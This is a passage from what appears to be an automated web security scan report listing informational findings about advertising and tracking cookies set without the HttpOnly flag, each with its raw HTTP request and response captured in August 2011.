P3P: CP="DSP LAW"
X-ApacheServer: ii90-12.friendfinderinc.com
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..2.;

8.41. http://medleyads.com/spot_history

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot_history

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spot_history?s=5232&a=70975&e=0 HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s5023=14252=1; group_history=2752=1; s1082=6308=2; s5022=9994=1; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1; __utmb=251326874.0.10.1313434615; __utmc=251326874; __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:50 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: __utmb=251326874.0.10.1313434615; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s1082=6308=2; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utmc=251326874; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5023=14252=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: group_history=2752=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5022=9994=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5232=70975=2&24810=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utma=251326874.488407081.1313434615.1313434615.1313434615.1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
P3P: CP="DSP LAW"
X-ApacheServer: ii53-20.friendfinderinc.com
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..2.;

8.42. http://phoenix.untd.com/TRCK/RGST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=167&TIME=168&RNS=1827548113 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHRE=18DDF_1:125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=18DF2_1:125D43_0_18E9A|125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC; expires=Thu, 12 Aug 2021 18:24:14 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

8.43. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&id=4c8235243e&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.112%20safari%2F535.1&x=1313434020454&c=0&t=0&v=0&m=0&vn=2.0.4&nv=0&pv=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=9532635152fbdebd

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=9532635152fbdebd; Domain=.crowdscience.com; expires=Sun, 13 Nov 2011 18:46:04; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c5b0255e4fc310b1;path=/';
document.cookie = '__csv=9532635152fbdebd|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('968b71d8793729f4'!='1'
...[SNIP]...

8.44. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A09801/b3/0/3/1008211/65654042.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A09801/b3/0/3/1008211/65654042.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnn.com%252F%253Fundefined%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dcnn%2520%253E%2520homepage%26DM_EOM%3D1&C=A09801 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rtc_wwje=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9Za/2KdJo=; udm_0=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; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlJtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGCxalPCFyDSiKJPgnHQBQDLJ3Rr4nnHKDvxdFk=; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtlR8qmZ5EYm2QQMyGpObby6m311PsHgzv01aCKDYPpg3DclGyTfYmv4eV+B8TaeJUThNteKFr5insIjhhJfnzN2nZibloi7gRJ2YvE++wSbp+230mBtxk; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
Set-Cookie: rtc_vQd1=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40kiIzC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99QRZ8P4IFvz9JZNg==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:06 GMT
Content-Length: 734

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['A09801_10001','A09801_10313'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

8.45. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEDksdBQv2eRa00pZUQMZdIU&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="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"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=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; rsi_segs_1000000=pUPFJ0OhbgIMV5/4eRtDiz+77hsEU4sbyGIEQahp+sZykmOIPiEcz5NLjlK+OXZFXqAWbjRJXKG7UB/FoDWgm0tKyf0YP+Sv7u97rS5K8ImyDyrPSVO53vGYk8sqcD4gJ57p3A0b720jN8kTZRve2URA5/fruwm/vxXtwIi+6dJEhin+St3tJY8IuYk+mWPlNAvvQAE/VZPYblTaBC1vuihZUSskJphr97knN55mqiRwMLZ7f87oEfK6IK4krR4WrBTXqfEnLgsVirq40wjSamQ7HZbK3peV; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0+FrwIQlbWdY9tIJXlrW7glQxHOWAfAxbNrOLxUG7W+7rNyz+N5XuHolMsqIjEUlDxmqri7uMRwZ3vWVdDTEjLRvwOsNhmbcXWbqW2OMjvmS5/RVljgi+sITAC+rxapnI2A7+Y9dRhE7+CdjvL08o80TglhkXbRsoogs76r1im6xyxAzTbCjnhsfshkMzqiXR7b8Uic7kvj1aaa643hRRxxVxxLA+l+NkD8l4jdy/Ejqcv65zrHJIUHrXgXqNA5mMl3cv+lfp4bN+30AWy6HpwhzJeR; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:45:59 GMT

GIF89a.............!.......,...........D..;

8.46. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/160487930.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/160487930.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Fmarkets%252Fmarkets_newyork%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Markets%2520%253E%2520Markets%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="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"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; rsi_segs_1000000=pUPNJ0OBb3IMlZ94u+w/RLtOeq6V5KAP0RzRZ4VoCwEqMnGBvEAYmwLmqlJ+uVZFlCQhi2DTJKCiIwSrVODkg8DOMr2FtOMOhsfXMZJDruSUOybqHTG7OdUgyGlvam+0r/hCGF9SUcx9trlZ2R1UiUGH5Qr3qJwzqIIgxHeHJzlCUNIrUDc3E0DGvDB1Due56aoDfTtsUAvrJBIV+VMyr28TPp9h2EgqBqmPHQ4/QkU7ToIsqEmaBWs4qU+ibe/AgxY65bRY3PgnEhFuZ8ituuI0pf4/; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0mBrwIMl594t637ir+57hsEDi5DEqzNkX2Ik9r5vw/ZgiF1vYNLjlK+Gc3/wmdDu6L/9Qgl4QT2DtLd8wxbiYqEeUUcnSXAMDKpnuGVNbHhRJLkXsWt8MvKd907Jx5GmxTcEC6fZjpEfcaKc1UvS9SSfDAuTU2Ck0ob0vjiUv367HU0+wjcuWheEBkx9ujpR9Hc4N6M2voeXCzlVjjPKvtnx8DbWJKCGu9dx1UdYuUp5TrBjYjr0Lf0NjQ/AO5hQa4ByzC+PstKvSjWycRXmphgeZZt; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
Set-Cookie: rtc_uDs4=MLsvsVEuMD5rJhHcH4/cwKoVTCR+lWjDJl+BFHwKiypaYzCUWk4NDAY0SGU5WbrwNTw5e3gnkqviZlPtf0a8KBkcx6pLq5/dsfXHzparj9vvCUNa+IMou8lvD/lyMqPeFrVkzdFCpZXRXPDGjAgkpGpgw5KA0h0Io1kDndlNAwjhAaTb5lCG0x9hFuchMtByn0fcXZ2uoDhaLYF0VwrLJI+k95+3mSCZrFqUwFJMXz1kRUqDh56X96i+nSdcfgAqKJlqhhwJLvUrHfyyq/xUQcjxrJ+Bl8nadDAKrkbaT0sgAhWAB7gesNoT8pnkcxlNSLt3gMNq8ae1V1GwMOCQEED0DuQ5q5uqdpwo7m2TYq+cq+GSxCffrlmxymFMQv7925F7vYVxiVvilSUfRGc2PLlxkeRcJr2zYareidrpeZNlwUc=; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:46:56 GMT
Content-Length: 1550

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006','H07710_50005',
...[SNIP]...

8.47. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/784372322.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/784372322.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Technology%2520%253E%2520Technology%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="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"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNJ0OBbwIMV594t637GLQSUx0QQshaUYKRlElRhEc6MjPMnNZz8nFpJPW5vrupC8lCsyJmYKBhPjVRNZcigIhmqy9caPE6KAjj9+yavk/KdbJkwe/qD/Or8kPC8FIYBTx0nA0T0fc9VX1q8Mrew2PJ75Byor6dSWR9iScAMmhoNLQF6IW55JZH7Ha61eSkxX9ZGyBQDuYSF/RXWSPaxDAKJ+RpsARZZmmUlSmxPZAe/ucTRouK8HscBc0djY/73JKd3//mIFs8+rXlY3hqotZAQFItxLP6hw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5361&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; Domain=.revsci.net; Expires=Mon, 12-Sep-2011 18:45:53 GMT; Path=/
Set-Cookie: rtc_LKl6=MLsvsVMucS5jJgGEqf0+SSboi2Cf8C1vfG5Yj1wkQJlJCzBkDjdLIVHHUYDkVpOt9vI5TWNHFkzcJPsrJWZ2qOMv39nU7OucskGTXdLE59ONvvowQQXiiV1fDsHj5Fpr55See62gOSdX3JM4LRi3mVhwfdiGTWdzvGrhzKJOXYkvZHlpvba083PdzfZ+5myzKSgTOBHmeHp0TJUhcoczD2fuAvqTLxGntKbJYV6671YbsoEW/gQdTgahzNCIYU3LKx950sEl9JlU4DLN/Ye673ZdIt7H7aJumAIJakbFVhWIkFw4f2CYn9LVs7UE9Zf1C1WFsUyUb9v0ePciulBEFa+Owqho/EPO+ZCqXtQ6jDmVZBxuzqhm9k0/+9kHvcZo9RJQaZ+ZcNxz9m6RbhR6Usv7; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:53 GMT
Content-Length: 1580

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10052','H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006',
...[SNIP]...

8.48. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/886893878.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/886893878.js?D=DM_LOC%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252F2011%252F08%252F15%252Fis-google-buying-motorola-for-its-17000-patents%252F%253Fiid%253DEL%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520technology%2520%253E%2520fortune%2520tech%2520blogs%26DM_REF%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
